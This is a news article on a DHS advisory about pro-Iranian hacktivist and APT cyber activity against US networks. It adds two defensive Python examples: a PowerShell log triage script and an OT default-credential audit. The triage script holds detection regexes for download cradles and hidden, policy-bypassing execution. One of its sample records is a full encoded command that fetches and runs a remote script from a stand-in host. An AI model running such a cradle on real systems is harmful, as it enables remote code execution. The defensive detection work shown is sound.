The United States is facing a sharp increase in cyber threats as the Department of Homeland Security (DHS) issued a formal advisory warning of low-level cyberattacks targeting US networks by pro-Iranian hacktivist groups.
The advisory, published against the backdrop of escalating kinetic and cyber hostilities between the US and Iran, highlights threats including distributed denial-of-service (DDoS) campaigns, exploitation of operational technology (OT) devices, and espionage targeting the defense sector.
These developments follow recent missile strikes by Iran’s Islamic Revolutionary Guard Corps (IRGC) on US military bases in Iraq and Qatar, in retaliation for US strikes on three Iranian nuclear facilities on June 22, 2025.
Key hacktivist collectives named in the DHS advisory include Team 313, a pro-Iranian group claiming responsibility for a recent DDoS attack on the Truth Social platform, citing the US missile attacks as motivation.
Other active groups include Handala, a pro-Palestinian collective targeting Israeli organizations with data theft, and Predatory Sparrow, a pro-Israeli group that has disrupted Iranian banks and cryptocurrency exchanges.
While the immediate cyber battlefield essentially involves the US, Israel, and Iran, the DHS warns that US-based organizations, especially those with business ties to Israel or those utilizing Israeli equipment, will likely see retaliatory cyber activity in the coming weeks.
Technical Analysis: Tactics, Techniques, and Procedures (TTPs) in the Spotlight
Iranian-affiliated threat actors, including advanced persistent threat (APT) groups such as APT34, APT35, and CyberAv3ngers, are employing a wide range of cyber operations.
Spearphishing, drive-by compromises, and exploitation of internet-facing operational technology (such as programmable logic controllers (PLCs) and human-machine interfaces (HMIs)) are among their most common tactics.
Notably, the CyberAv3ngers group has previously attacked US water and wastewater facilities by exploiting default credentials on internet-connected OT devices, underscoring the risk to critical infrastructure.
DDoS attacks, the simplest disruptive method in their toolkit, are being increasingly used to target organizations supporting US or Israeli interests, as was evident in the Truth Social outage attributed to Team 313.
Additionally, Iranian APTs, such as APT34, are running strategic espionage campaigns that utilize spearphishing, PowerShell-based fileless malware, and stolen credentials for lateral movement within victim networks.
APT35, meanwhile, is known for its sophisticated phishing campaigns, which sometimes involve distributing malware via password-protected archives, and for scanning public systems for critical vulnerabilities, such as Log4j and ProxyShell.
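The PowerShell-based fileless tradecraft described above leaves traces in Windows PowerShell Script Block Logging (Event ID 4104) rather than on disk. The following is an added example, not code from the DHS advisory or from this article, of how a defender can triage such records: it decodes any -EncodedCommand payload and scores each record against a small set of heuristic indicators (encoded command lines, download cradles, in-memory invocation, hidden windows, execution-policy bypass). The rule weights, the record field names and the sample records are all constructed for illustration.

```python
"""Triage of PowerShell Script Block Logging records (Windows Event ID 4104)
for fileless-execution indicators: encoded command lines, download cradles,
in-memory invocation and hidden-window execution.

Added illustration: the rules are heuristic and the log records are constructed."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# (rule name, pattern, weight). Weights are illustrative, not calibrated.
RULES = [
    ("encoded_command", re.compile(r"-(?:e|en|enc|encodedcommand)\b", re.I), 3),
    ("download_cradle", re.compile(r"net\.webclient|downloadstring|invoke-webrequest|\biwr\b", re.I), 3),
    ("in_memory_invoke", re.compile(r"invoke-expression|\biex\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("policy_bypass", re.compile(r"-e(?:p|x|xecutionpolicy)\s+bypass", re.I), 2),
    ("base64_decode", re.compile(r"frombase64string", re.I), 2),
]
ENC_ARG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(script_text: str) -> Optional[str]:
    """Decode the UTF-16LE/base64 payload of an -EncodedCommand argument, if present."""
    m = ENC_ARG.search(script_text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    record_id: int
    score: int
    rules: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def triage(records, threshold: int = 4) -> List[Finding]:
    """Score each record; the rules also run over the decoded payload so that
    encoding alone does not hide a download cradle."""
    findings = []
    for rec in records:
        text = rec["ScriptBlockText"]
        decoded = decode_encoded_command(text)
        haystack = text if decoded is None else text + "\n" + decoded
        hits = [(name, w) for name, rx, w in RULES if rx.search(haystack)]
        score = sum(w for _, w in hits)
        if score >= threshold:
            findings.append(Finding(rec["RecordId"], score, [n for n, _ in hits], decoded))
    return findings


def encode_for_sample(script: str) -> str:
    """UTF-16LE + base64, the -EncodedCommand form; used here only to build sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (ScriptBlockText field only); not real telemetry.
SAMPLE_RECORDS = [
    {"RecordId": 1, "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"RecordId": 2, "ScriptBlockText": "powershell.exe -nop -w hidden -ep bypass -enc "
        + encode_for_sample("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')")},
    {"RecordId": 3, "ScriptBlockText": "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties LastLogonDate"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"record {f.record_id}: score={f.score} rules={f.rules}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Only record 2 crosses the threshold; records 1 and 3 are ordinary administrative activity and score zero, which is the point of scoring on combinations rather than alerting on any single flag. In production the threshold and weights would be tuned against the organisation's own baseline of legitimate PowerShell use.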
Mitigation and Protection: Shielding US Networks from Attack
To counter these evolving threats, the DHS recommends a robust, multilayered cybersecurity strategy.
Organizations are encouraged to implement cloud-based DDoS protection, traffic filtering, and web application firewalls to manage high volumes of malicious requests.
Non-essential online services, especially those linked to OT, should be promptly disabled. Critical OT devices must be updated with unique, strong credentials, and all public-facing authentication portals reviewed for weak or default passwords.
Regular employee training, network segmentation, and vulnerability patching are further emphasized to reduce exposure to spearphishing and drive-by compromises.
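The credential and exposure recommendations above translate into a concrete audit of the OT asset inventory. The following is an added example, not code from the DHS advisory or from this article: an offline check that flags devices still using default credentials, weak passwords, credentials shared across devices (so they are not unique), and non-essential services that remain reachable from the internet. The default-credential list, the strength thresholds, the device fields and the sample inventory are constructed placeholders; a real audit would load a vetted default-credential list and the organisation's own asset data.

```python
"""Offline audit of an OT asset inventory: default or weak credentials on
authentication portals, the same credential reused across devices, and
non-essential services reachable from the internet.

Added illustration. The inventory and the default-credential list are
constructed placeholders, not vendor defaults or real assets."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Placeholder default pairs for the example; a real audit loads a vetted list.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "1234"),
                       ("operator", "operator"), ("root", "password")}
COMMON_PASSWORDS = {"password", "changeme", "welcome"}
MIN_PASSWORD_LENGTH = 12


@dataclass
class Device:
    name: str
    kind: str            # plc, hmi, historian, ...
    service: str         # authentication portal or management service
    internet_facing: bool
    essential: bool      # must this service stay reachable for operations?
    username: str
    password: str        # as recorded during a configuration review


@dataclass
class Finding:
    device: str
    severity: str        # critical, high, medium
    issue: str


def password_is_weak(username: str, password: str) -> bool:
    """Coarse strength check: length, username reuse, all-digit or common word."""
    p = password.lower()
    return (len(password) < MIN_PASSWORD_LENGTH or p == username.lower()
            or password.isdigit() or p in COMMON_PASSWORDS)


def audit(devices: List[Device]) -> List[Finding]:
    findings: List[Finding] = []
    holders = defaultdict(list)              # credential pair -> device names
    for d in devices:
        cred = (d.username, d.password)
        holders[cred].append(d.name)
        where = "internet-facing" if d.internet_facing else "internal"
        if cred in DEFAULT_CREDENTIALS:
            findings.append(Finding(d.name, "critical" if d.internet_facing else "high",
                f"default credentials on {d.service} ({where}); set a unique strong password"))
        elif password_is_weak(d.username, d.password):
            findings.append(Finding(d.name, "high" if d.internet_facing else "medium",
                f"weak password on {d.service} ({where})"))
        if d.internet_facing and not d.essential:
            findings.append(Finding(d.name, "high",
                f"non-essential {d.service} reachable from the internet; disable it or move it behind the VPN"))
    # Credentials must be unique per device: flag every holder of a shared pair.
    for names in holders.values():
        if len(names) > 1:
            for n in names:
                others = ", ".join(x for x in names if x != n)
                findings.append(Finding(n, "medium", f"credential shared with {others}"))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed inventory for the example; names and values are placeholders.
SAMPLE_INVENTORY = [
    Device("plc-pump-01", "plc", "web-config", True, False, "admin", "1234"),
    Device("hmi-intake", "hmi", "vnc", True, True, "operator", "Wf9!qLm2#vA7pR"),
    Device("hmi-chlorine", "hmi", "vnc", False, True, "operator", "Wf9!qLm2#vA7pR"),
    Device("historian-01", "historian", "https", False, False, "svc_hist", "summer2025"),
]

if __name__ == "__main__":
    results = audit(SAMPLE_INVENTORY)
    order = ("critical", "high", "medium")
    for f in sorted(results, key=lambda f: order.index(f.severity)):
        print(f"[{f.severity}] {f.device}: {f.issue}")
    print(summarize(results))
```

Severity is driven by exposure: a default credential on an internet-facing portal is the case the advisory singles out and is rated critical, while the same defect on an internal-only device is still high because OT networks are rarely as segmented as their diagrams claim. The shared-credential check is what enforces the "unique" part of the recommendation, which a per-device password check alone cannot see.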
For organizations in critical sectors such as energy, finance, and telecom, these steps are vital to prevent operational disruption, data breaches, and reputational damage.
As geopolitical tensions continue to unfold, US entities must remain vigilant, leveraging threat intelligence and proactive security measures to safeguard not only their own assets but also the broader stability of American infrastructure and the economy.